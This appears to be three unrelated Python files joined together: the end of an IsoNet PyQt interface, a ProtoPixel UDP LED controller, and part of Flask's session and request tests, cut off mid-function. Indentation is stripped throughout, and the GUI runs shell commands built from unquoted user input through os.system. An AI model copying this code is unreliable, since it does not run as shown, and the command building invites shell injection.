mask_dir = self.model.sim_path(pwd, mask_dir)
description = "run following command(s) to make mask:"
#cmd = "echo {} >> log.txt".format( description )
#os.system(cmd)
self.logWindow.append(description)
line = "isonet.py make_mask {} {} --percentile {} --threshold {} ".format( tomo_dir,mask_dir,percentile,threshold )
#cmd = "echo {} >> log.txt".format( line )
#os.system(cmd)
line += "\n"
self.logWindow.append(line)
cmd2run.append(line)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
if self.checkBox_deconvolve.isChecked():
tomo_dir = self.lineEdit_tomo_dir.text()
angpix = self.lineEdit_angpix.text()
defocus = self.lineEdit_defocus.text()
error_msg,fileList = self.model.paraChecksDeconvolve(tomo_dir, angpix, defocus)
if error_msg != "":
error_msg = "########## Error! ##########\n" + error_msg
#cmd = "echo \"{}\" >> log.txt".format(error_msg)
#print(cmd)
#os.system(cmd)
self.logWindow.append(error_msg)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
return None
elif len(fileList) > 0:
tomo_dir = self.model.sim_path(pwd, tomo_dir)
tomo_dir_deconv = tomo_dir + "_deconv"
description = "run following command(s) to deconvolve:"
#cmd = "echo {} >> log.txt".format( description )
#os.system(cmd)
self.logWindow.append(description)
if not self.model.isValidPath(tomo_dir_deconv):
os.mkdir(tomo_dir_deconv)
for file in fileList:
basename = os.path.basename(file)
line = "python deconvolve.py {} {} {} {} ".format( tomo_dir+"/"+file, tomo_dir_deconv+"/"+basename, angpix, defocus)
#cmd = "echo {} >> log.txt".format( line )
#os.system(cmd)
#line += "\n"
self.logWindow.append(line)
cmd2run.append(line)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
line = "\n"
self.logWindow.append(line)
if self.checkBox_train.isChecked():
tomo_dir = self.lineEdit_tomo_dir.text()
mask_dir = self.lineEdit_mask_dir.text()
iteration = self.lineEdit_iteration.text() if self.lineEdit_iteration.text() else '30'
epochs = self.lineEdit_epochs.text() if self.lineEdit_epochs.text() else '8'
steps_per_epoch = self.lineEdit_steps_per_epoch.text() if self.lineEdit_steps_per_epoch.text() else '200'
ncube = self.lineEdit_ncube.text() if self.lineEdit_ncube.text() else '300'
noise_level = self.lineEdit_noise_level.text() if self.lineEdit_noise_level.text() else '0.1'
noise_start_iter = self.lineEdit_noise_start_iteration.text() if self.lineEdit_noise_start_iteration.text() else '15'
noise_pause = self.lineEdit_noise_pause.text() if self.lineEdit_noise_pause.text() else '3'
batch_size = self.lineEdit_batch_size.text() if self.lineEdit_batch_size.text() else '8'
gpuID = self.lineEdit_gpu.text() if self.lineEdit_gpu.text() else '0,1,2,3'
pretrain_model = self.lineEdit_pretrain_model.text()
error_msg = self.model.paraChecksRefine( tomo_dir, mask_dir, pretrain_model,
iteration, epochs, steps_per_epoch, ncube,
noise_level,noise_start_iter, noise_pause, batch_size, gpuID)
if error_msg != "":
error_msg = "########## Error! ##########\n" + error_msg
#cmd = "echo \"{}\" >> log.txt".format(error_msg)
#print(cmd)
#os.system(cmd)
self.logWindow.append(error_msg)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
return None
#with pretrain model
else :
tomo_dir = self.model.sim_path(pwd, tomo_dir)
mask_dir = self.model.sim_path(pwd, mask_dir)
if pretrain_model:
pretrain_model = self.model.sim_path(pwd, pretrain_model)
line = "isonet.py refine --input_dir {} --mask_dir {} --pretrain_model {} --iterations {} --steps_per_epoch {} --ncube {} --noise_level {} --noise_start_iter {} --noise_pause {} --epochs {} --batch_size {} --gpuID {}".format(
tomo_dir, mask_dir, pretrain_model, iteration,steps_per_epoch,ncube,noise_level,noise_start_iter,noise_pause,epochs,batch_size,gpuID)
else:
line = "isonet.py refine --input_dir {} --mask_dir {} --iterations {} --steps_per_epoch {} --ncube {} --noise_level {} --noise_start_iter {} --noise_pause {} --epochs {} --batch_size {} --gpuID {}".format(
tomo_dir, mask_dir, iteration,steps_per_epoch,ncube,noise_level,noise_start_iter,noise_pause,epochs,batch_size,gpuID)
description = "run following command(s) to refine:"
#cmd = "echo {} >> log.txt".format( description )
#os.system(cmd)
self.logWindow.append(description)
#cmd = "echo {} >> log.txt".format( line )
#os.system(cmd)
#line += "\n"
self.logWindow.append(line)
cmd2run.append(line)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
if self.checkBox_predict.isChecked():
tomo_dir = self.lineEdit_tomo_dir.text()
output_dir = self.lineEdit_output.text()
refined_model = self.lineEdit_refined_model.text()
gpuID = self.lineEdit_gpu.text() if self.lineEdit_gpu.text() else '0,1,2,3'
error_msg,fileList = self.model.paraChecksPredict(tomo_dir, output_dir, refined_model, gpuID)
if error_msg != "":
error_msg = "########## Error! ##########\n" + error_msg
#cmd = "echo \"{}\" >> log.txt".format(error_msg)
#print(cmd)
#os.system(cmd)
self.logWindow.append(error_msg)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
return None
elif len(fileList) > 0:
tomo_dir = self.model.sim_path(pwd, tomo_dir)
output_dir = self.model.sim_path(pwd, output_dir)
refined_model = self.model.sim_path(pwd, refined_model)
description = "run following command(s) to predict:"
#cmd = "echo {} >> log.txt".format( description )
#os.system(cmd)
self.logWindow.append(description)
for file in fileList:
basename = file[:-4]
output_file = basename + "_pred.mrc"
line = "isonet.py predict {} {} {} --gpuID {} ".format( tomo_dir+"/"+file, output_dir+"/"+output_file, refined_model, gpuID)
#cmd = "echo {} >> log.txt".format( line )
#os.system(cmd)
line += "\n"
self.logWindow.append(line)
cmd2run.append(line)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
return cmd2run
#TODO: add a function to update the log window
def runProgram(self):
cmd2run = self.printCmds()
#print(cmd2run)
#self.model.processing = True
#t = Thread(target=self.update_log)
#t.start()
#self.update_log()
#self.model.processing = False
#t.terminate()
#import subprocess
#text = os.popen("ls -l").read()
#command = ['ls', '-l']
#p = subprocess.Popen(command, stdout=subprocess.PIPE)
#text = p.stdout.read()
#retcode = p.wait()
#print(str(text))
#file_log = open('log.txt', 'a')
#file_log.write(str(text))
#file_log.close()
#self.update_log()
for line in cmd2run:
cmd = "{} ".format( line)
print(cmd)
os.system(cmd)
def showResults( self ):
output_dir = self.lineEdit_output.text()
error_message = ""
if output_dir:
if not self.model.isValidPath(output_dir):
error_message += "output directory does not exist! \n"
else:
fileList = self.model.is_file_exist(output_dir, '.mrc')
if len(fileList) == 0:
error_message += "no mrc file exists in output directory \n"
else:
error_message += "output directory is not provided! \n"
if error_message == "":
cmd = "3dmod {}/*mrc".format(output_dir)
os.system(cmd)
else:
self.logWindow.append(error_message)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
'''
def update_log(self):
f = open("log.txt", 'r')
where = f.tell()
line = f.readline()
while line:
self.logWindow.append(line)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
where+=1
while self.model.processing:
where = f.tell()
line = f.readline()
if not line:
time.sleep(1)
f.seek(where)
else:
self.logWindow.append(line)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
'''
def main():
"""
    This is the main entry point of the application. The startup code at the end
    of mainwindow.py is not executed, since this script is now the main program;
    the equivalent code from the pyuic5-generated mainwindow.py is reproduced here.
"""
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = MainWindowUIClass()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
if __name__ == "__main__":
    main()
|
Virtual_controller_to_wifi.py
|
import socket
import struct
import sys
import time
from time import time as tt
import numpy as np
import os.path
from openframeworks import *
from protopixel import Content
import socket
UDP_IP = "192.168.1.100"
UDP_PORT = 2390
content = Content('Virtual controller')
content.add_parameter("FPS_LIMIT", min=0, max=60, value=30)
content.add_parameter("Controller1", value=False)
content.add_parameter("audio_react1", value=False)
content.add_parameter("IP_1", value="192.168.133.20")
content.add_parameter("Controller2", value=False)
content.add_parameter("audio_react2", value=False)
content.add_parameter("IP_2", value="192.168.133.21")
content.add_parameter("Controller3", value=False)
content.add_parameter("audio_react3", value=False)
content.add_parameter("IP_3", value="192.168.133.22")
content.add_parameter("Controller4", value=False)
content.add_parameter("audio_react4", value=False)
content.add_parameter("IP_4", value="192.168.133.23")
@content.parameter_changed('Output_name')
def output_name_changed(newval):
#global FILEPATH
#FILEPATH = "../../../"+newval+".txt"
#print "New path:", newval
pass
def setup():
global controller, update_time, timmer, qframe, qtimmer, is_started,FPS
print "SETUP------------------------"
FPS = 30
controller = None
update_time = 1.0/FPS
timmer = tt()
qframe = 0
qtimmer = tt()
is_started = True
#pt = ofToDataPath(".")
#print pt,"-----------------ooooooooooo"
def update():
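    # For each of the four virtual controllers, pack two consecutive outlets (each padded or
    # truncated to 200 LEDs x 3 bytes) into a single 1200-byte UDP datagram and, when that
    # controller is enabled, send it to its configured IP; then throttle the loop to FPS_LIMIT.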
global update_time, timmer, qframe, qtimmer, controller,FPS
if controller != None and controller.outlets[0] != None:
i = 0
for q in range(4):
msg = ""
numlights = len(controller.outlets[i]) / 3
if numlights < 200:
msg = ''.join( chr(v) for v in controller.outlets[i])
msg = msg + ''.join( [chr(0)] * ((200-numlights)*3))
else:
msg = ''.join( chr(v) for v in controller.outlets[i][0:600])
i = i+1
numlights = len(controller.outlets[i]) / 3
if numlights < 200:
msg = msg + ''.join( chr(v) for v in controller.outlets[i])
msg = msg + ''.join( [chr(0)] * ((200-numlights)*3))
else:
msg = msg + ''.join( chr(v) for v in controller.outlets[i][0:600])
i = i+1
#print content['IP_'+str(i+1)]
#print content['Controller'+str(i+1)]
#msg = ''.join( [chr(255)] * ((400)*3))
if content['Controller'+str(q+1)]:
try:
print len(msg), content['IP_'+str(q+1)]
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
sock.sendto(msg, (content['IP_'+str(q+1)], UDP_PORT))
except:
print "socket error unknown at device: "+str(q+1)
#----------
#FPS check
#if qframe >= FPS-1:
# qframe = 0
# print tt() - qtimmer
# qtimmer = tt()
# print "------------------"
#else:
# qframe = qframe + 1;
#--------
#--------
#FPS limiter:
actual = tt()
elapsed = actual-timmer
#30 fps --> 1/30
diff = update_time- elapsed
if diff > 0:
time.sleep(diff)
timmer = tt()
FPS = content['FPS_LIMIT']
update_time = 1.0/FPS
#--------
def draw():
pass
def exit():
global controller
print "EXIT------------------------"
controller.running = False
controller = None
def on_enable():
global controller, is_started
if not is_started:
return
print "ENABLE------------------------"
controller = FakeTCPController()
    controller.listen()  # open the port
    #controller.announce()  # send an announce
def on_disable():
global controller
print "DISABLE------------------------"
controller.running = False
controller = None
class FakeTCPController(object):
def __init__(self):
self.name = "Wifi"
self.mac = "00:00:00:00:00:01"
self.t = content.Thread(target=self._process)
self.t.daemon = True
self.running = False
self.outlets = [np.zeros(0)]*8
def announce(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
message_version = 2
firmware_version = 1
hardware_version = 2
mac_addr_1, mac_addr_2, mac_addr_3, mac_addr_4, mac_addr_5, mac_addr_6 = (0, 0, 0, 0, 0, 0)
actual_ip_1, actual_ip_2, actual_ip_3, actual_ip_4 = (127, 0, 0, 1)
properties = 0
actual_gateway_1, actual_gateway_2, actual_gateway_3, actual_gateway_4 = (192, 168, 133, 1)
actual_mask_1, actual_mask_2, actual_mask_3, actual_mask_4 = (255, 255, 255, 0)
device_name = "WIFI"
static_ip_1, static_ip_2, static_ip_3, static_ip_4 = (192, 168, 133, 222)
static_gateway_1, static_gateway_2, static_gateway_3, static_gateway_4 = (192, 168, 133, 1)
static_mask_1, static_mask_2, static_mask_3, static_mask_4 = (255, 255, 255, 0)
message = struct.pack('<HHB6B4BB4B4B16s4B4B4B',
message_version,
firmware_version,
hardware_version,
mac_addr_1, mac_addr_2, mac_addr_3, mac_addr_4, mac_addr_5, mac_addr_6,
actual_ip_1, actual_ip_2, actual_ip_3, actual_ip_4,
properties,
actual_gateway_1, actual_gateway_2, actual_gateway_3, actual_gateway_4,
actual_mask_1, actual_mask_2, actual_mask_3, actual_mask_4,
device_name,
static_ip_1, static_ip_2, static_ip_3, static_ip_4,
static_gateway_1, static_gateway_2, static_gateway_3, static_gateway_4,
static_mask_1, static_mask_2, static_mask_3, static_mask_4,
)
s.sendto(message, ('localhost', 5006))
def listen(self):
self.running = True
self.t.start()
def stop(self):
self.running = False
def _process(self):
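        # Background listener: accept a ProtoPixel TCP connection on localhost:5015, read the
        # 23-byte "PROTO" header carrying eight big-endian LED counts, acknowledge with 'ok',
        # then read each outlet's RGB payload into a numpy array. While waiting, the controller
        # re-announces itself over UDP every few iterations.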
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('localhost',5015))
s.listen(1)
s.settimeout(0.3)
#self.timmer = tt()
i = 0
while self.running:
try:
i = (1 + i) % 10
if i == 0:
self.announce()
(ss, _) = s.accept()
ss.settimeout(1)
print "New Connection"
while self.running:
header = ss.recv(23)
if not header:
break
assert header[:5] == "PROTO"
ss.send('ok')
LED_count = struct.unpack('>8H',header[7:7+8*2])
for i in range(8):
lcount = LED_count[i]
if lcount == 0:
continue
outletdata = ss.recv(lcount*3)
self.outlets[i] = np.fromstring(outletdata,dtype=np.uint8)
except socket.timeout:
pass
except socket.error:
pass
s.close()
def __del__(self):
self.running = False
|
test_basic.py
|
import gc
import re
import sys
import time
import uuid
import weakref
from datetime import datetime
from platform import python_implementation
from threading import Thread
import pytest
import werkzeug.serving
from werkzeug.exceptions import BadRequest
from werkzeug.exceptions import Forbidden
from werkzeug.exceptions import NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
import flask
require_cpython_gc = pytest.mark.skipif(
python_implementation() != "CPython", reason="Requires CPython GC behavior",
)
def test_options_work(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
assert rv.data == b""
def test_options_on_multiple_rules(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
@app.route("/", methods=["PUT"])
def index_put():
return "Aha!"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST", "PUT"]
def test_provide_automatic_options_attr():
app = flask.Flask(__name__)
def index():
return "Hello World!"
index.provide_automatic_options = False
app.route("/")(index)
rv = app.test_client().open("/", method="OPTIONS")
assert rv.status_code == 405
app = flask.Flask(__name__)
def index2():
return "Hello World!"
index2.provide_automatic_options = True
app.route("/", methods=["OPTIONS"])(index2)
rv = app.test_client().open("/", method="OPTIONS")
assert sorted(rv.allow) == ["OPTIONS"]
def test_provide_automatic_options_kwarg(app, client):
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule("/", view_func=index, provide_automatic_options=False)
app.add_url_rule(
"/more",
view_func=more,
methods=["GET", "POST"],
provide_automatic_options=False,
)
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD"]
rv = client.open("/", method="OPTIONS")
assert rv.status_code == 405
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "POST"]
rv = client.open("/more", method="OPTIONS")
assert rv.status_code == 405
def test_request_dispatching(app, client):
@app.route("/")
def index():
return flask.request.method
@app.route("/more", methods=["GET", "POST"])
def more():
return flask.request.method
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
def test_disallow_string_for_allowed_methods(app):
with pytest.raises(TypeError):
@app.route("/", methods="GET POST")
def index():
return "Hey"
def test_url_mapping(app, client):
random_uuid4 = "7eb41166-9ebf-4d26-b771-ea3f54f8b383"
def index():
return flask.request.method
def more():
return flask.request.method
def options():
return random_uuid4
app.add_url_rule("/", "index", index)
app.add_url_rule("/more", "more", more, methods=["GET", "POST"])
# Issue 1288: Test that automatic options are not added
# when non-uppercase 'options' in methods
app.add_url_rule("/options", "options", options, methods=["options"])
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
rv = client.open("/options", method="OPTIONS")
assert rv.status_code == 200
assert random_uuid4 in rv.data.decode("utf-8")
def test_werkzeug_routing(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
def bar():
return "bar"
def index():
return "index"
app.view_functions["bar"] = bar
app.view_functions["index"] = index
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_endpoint_decorator(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
@app.endpoint("bar")
def bar():
return "bar"
@app.endpoint("index")
def index():
return "index"
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_session(app, client):
@app.route("/set", methods=["POST"])
def set():
assert not flask.session.accessed
assert not flask.session.modified
flask.session["value"] = flask.request.form["value"]
assert flask.session.accessed
assert flask.session.modified
return "value set"
@app.route("/get")
def get():
assert not flask.session.accessed
assert not flask.session.modified
v = flask.session.get("value", "None")
assert flask.session.accessed
assert not flask.session.modified
return v
assert client.post("/set", data={"value": "42"}).data == b"value set"
assert client.get("/get").data == b"42"
def test_session_using_server_name(app, client):
app.config.update(SERVER_NAME="example.com")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_and_port(app, client):
app.config.update(SERVER_NAME="example.com:8080")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_port_and_path(app, client):
app.config.update(SERVER_NAME="example.com:8080", APPLICATION_ROOT="/foo")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/foo")
assert "domain=example.com" in rv.headers["set-cookie"].lower()
assert "path=/foo" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_application_root(app, client):
class PrefixPathMiddleware:
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ["SCRIPT_NAME"] = self.prefix
return self.app(environ, start_response)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, "/bar")
app.config.update(APPLICATION_ROOT="/bar")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "path=/bar" in rv.headers["set-cookie"].lower()
def test_session_using_session_settings(app, client):
app.config.update(
SERVER_NAME="www.example.com:8080",
APPLICATION_ROOT="/test",
SESSION_COOKIE_DOMAIN=".example.com",
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_SAMESITE="Lax",
SESSION_COOKIE_PATH="/",
)
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://www.example.com:8080/test/")
cookie = rv.headers["set-cookie"].lower()
assert "domain=.example.com" in cookie
assert "path=/" in cookie
assert "secure" in cookie
assert "httponly" not in cookie
assert "samesite" in cookie
def test_session_using_samesite_attribute(app, client):
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
app.config.update(SESSION_COOKIE_SAMESITE="invalid")
with pytest.raises(ValueError):
client.get("/")
app.config.update(SESSION_COOKIE_SAMESITE=None)
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite" not in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Strict")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=strict" in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Lax")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=lax" in cookie
def test_session_localhost_warning(recwarn, app, client):
app.config.update(SERVER_NAME="localhost:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://localhost:5000/")
assert "domain" not in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "'localhost' is not a valid cookie domain" in str(w.message)
def test_session_ip_warning(recwarn, app, client):
app.config.update(SERVER_NAME="127.0.0.1:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://127.0.0.1:5000/")
assert "domain=127.0.0.1" in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "cookie domain is an IP" in str(w.message)
def test_missing_session(app):
app.secret_key = None
def expect_exception(f, *args, **kwargs):
e = pytest.raises(RuntimeError, f, *args, **kwargs)
assert e.value.args and "session is unavailable" in e.value.args[0]
with app.test_request_context():
assert flask.session.get("missing_key") is None
expect_exception(flask.session.__setitem__, "foo", 42)
expect_exception(flask.session.pop, "foo")
def test_session_expiration(app, client):
permanent = True
@app.route("/")
def index():
flask.session["test"] = 42
flask.session.permanent = permanent
return ""
@app.route("/test")
def test():
return str(flask.session.permanent)
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"(?i)\bexpires=([^;]+)", rv.headers["set-cookie"])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
assert expires.year == expected.year
assert expires.month == expected.month
assert expires.day == expected.day
rv = client.get("/test")
assert rv.data == b"True"
permanent = False
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"\bexpires=([^;]+)", rv.headers["set-cookie"])
assert match is None
def test_session_stored_last(app, client):
@app.after_request
def modify_session(response):
flask.session["foo"] = 42
return response
@app.route("/")
def dump_session_contents():
return repr(flask.session.get("foo"))
assert client.get("/").data == b"None"
assert client.get("/").data == b"42"
def test_session_special_types(app, client):
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.route("/")
def dump_session_contents():
flask.session["t"] = (1, 2, 3)
flask.session["b"] = b"\xff"
flask.session["m"] = flask.Markup("<html>")
flask.session["u"] = the_uuid
flask.session["d"] = now
flask.session["t_tag"] = {" t": "not-a-tuple"}
flask.session["di_t_tag"] = {" t__": "not-a-tuple"}
flask.session["di_tag"] = {" di": "not-a-dict"}
return "", 204
with client:
client.get("/")
s = flask.session
assert s["t"] == (1, 2, 3)
assert type(s["b"]) == bytes
assert s["b"] == b"\xff"
assert type(s["m"]) == flask.Markup
assert s["m"] == flask.Markup("<html>")
assert s["u"] == the_uuid
assert s["d"] == now
assert s["t_tag"] == {" t": "not-a-tuple"}
assert s["di_t_tag"] == {" t__": "not-a-tuple"}
assert s["di_tag"] == {" di": "not-a-dict"}
def test_session_cookie_setting(app):
is_permanent = True
@app.route("/bump")
def bump():
rv = flask.session["foo"] = flask.session.get("foo", 0) + 1
flask.session.permanent = is_permanent
return str(rv)
@app.route("/read")
def read():
return str(flask.session.get("foo", 0))
def run_test(expect_header):
with app.test_client() as c:
assert c.get("/bump").data == b"1"
assert c.get("/bump").data == b"2"
assert c.get("/bump").data == b"3"
rv = c.get("/read")
set_cookie = rv.headers.get("set-cookie")
assert (set_cookie is not None) == expect_header
assert rv.data == b"3"
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=True)
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
def test_session_vary_cookie(app, client):
@app.route("/set")
def set_session():
flask.session["test"] = "test"
return ""
@app.route("/get")
def get():
return flask.session.get("test")
@app.route("/getitem")
def getitem():
return flask.session["test"]
@app.route("/setdefault")
def setdefault():
return flask.session.setdefault("test", "default")
@app.route("/vary-cookie-header-set")
def vary_cookie_header_set():
response = flask.Response()
response.vary.add("Cookie")
flask.session["test"] = "test"
return response
@app.route("/vary-header-set")
def vary_header_set():
response = flask.Response()
response.vary.update(("Accept-Encoding", "Accept-Language"))
flask.session["test"] = "test"
return response
@app.route("/no-vary-header")
def no_vary_header():
return ""
def expect(path, header_value="Cookie"):
rv = client.get(path)
if header_value:
# The 'Vary' key should exist in the headers only once.
assert len(rv.headers.get_all("Vary")) == 1
assert rv.headers["Vary"] == header_value
else:
assert "Vary" not in rv.headers
expect("/set")
expect("/get")
expect("/getitem")
expect("/setdefault")
expect("/vary-cookie-header-set")
expect("/vary-header-set", "Accept-Encoding, Accept-Language, Cookie")
expect("/no-vary-header", None)
def test_flashes(app, req_ctx):
assert not flask.session.modified
flask.flash("Zap")
flask.session.modified = False
flask.flash("Zip")
assert flask.session.modified
assert list(flask.get_flashed_messages()) == ["Zap", "Zip"]
def test_extended_flashing(app):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
@app.route("/")
def index():
flask.flash("Hello World")
flask.flash("Hello World", "error")
flask.flash(flask.Markup("<em>Testing</em>"), "warning")
return ""
@app.route("/test/")
def test():
messages = flask.get_flashed_messages()
assert list(messages) == [
"Hello World",
"Hello World",
flask.Markup("<em>Testing</em>"),
]
return ""
@app.route("/test_with_categories/")
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
assert len(messages) == 3
assert list(messages) == [
("message", "Hello World"),
("error", "Hello World"),
("warning", flask.Markup("<em>Testing</em>")),
]
return ""
@app.route("/test_filter/")
def test_filter():
messages = flask.get_flashed_messages(
category_filter=["message"], with_categories=True
)
assert list(messages) == [("message", "Hello World")]
return ""
@app.route("/test_filters/")
def test_filters():
messages = flask.get_flashed_messages(
category_filter=["message", "warning"], with_categories=True
)
assert list(messages) == [
("message", "Hello World"),
("warning", flask.Markup("<em>Testing</em>")),
]
return ""
@app.route("/test_filters_without_returning_categories/")
def test_filters2():
messages = flask.get_flashed_messages(category_filter=["message", "warning"])
assert len(messages) == 2
assert messages[0] == "Hello World"
assert messages[1] == flask.Markup("<em>Testing</em>")
return ""
# Create new test client on each test to clean flashed messages.
client = app.test_client()
client.get("/")
client.get("/test_with_categories/")
client = app.test_client()
client.get("/")
client.get("/test_filter/")
client = app.test_client()
client.get("/")
client.get("/test_filters/")
client = app.test_client()
client.get("/")
client.get("/test_filters_without_returning_categories/")
def test_request_processing(app, client):
evts = []
@app.before_request
def before_request():
evts.append("before")
@app.after_request
def after_request(response):
response.data += b"|after"
evts.append("after")
return response
@app.route("/")
def index():
assert "before" in evts
assert "after" not in evts
return "request"
assert "after" not in evts
rv = client.get("/").data
assert "after" in evts
assert rv == b"request|after"
def test_request_preprocessing_early_return(app, client):
evts = []
@app.before_request
def before_request1():
evts.append(1)
@app.before_request
def before_request2():
evts.append(2)
return "hello"
@app.before_request
def before_request3():
evts.append(3)
return "bye"
@app.route("/")
def index():
evts.append("index")
return "damnit"
rv = client.get("/").data.strip()
assert rv == b"hello"
assert evts == [1, 2]
def test_after_request_processing(app, client):
@app.route("/")
def index():
@flask.after_this_request
def foo(response):
response.headers["X-Foo"] = "a header"
return response
return "Test"
resp = client.get("/")
assert resp.status_code == 200
assert resp.headers["X-Foo"] == "a header"
def test_teardown_request_handler(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_debug_mode(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_error(app, client):
called = []
app.testing = False
@app.teardown_request
def teardown_request1(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except Exception:
pass
@app.teardown_request
def teardown_request2(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except Exception:
pass
@app.route("/")
def fails():
1 // 0
rv = client.get("/")
assert rv.status_code == 500
assert b"Internal Server Error" in rv.data
assert len(called) == 2
def test_before_after_request_order(app, client):
called = []
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route("/")
def index():
return "42"
rv = client.get("/")
assert rv.data == b"42"
assert called == [1, 2, 3, 4, 5, 6]
def test_error_handling(app, client):
app.testing = False
@app.errorhandler(404)
def not_found(e):
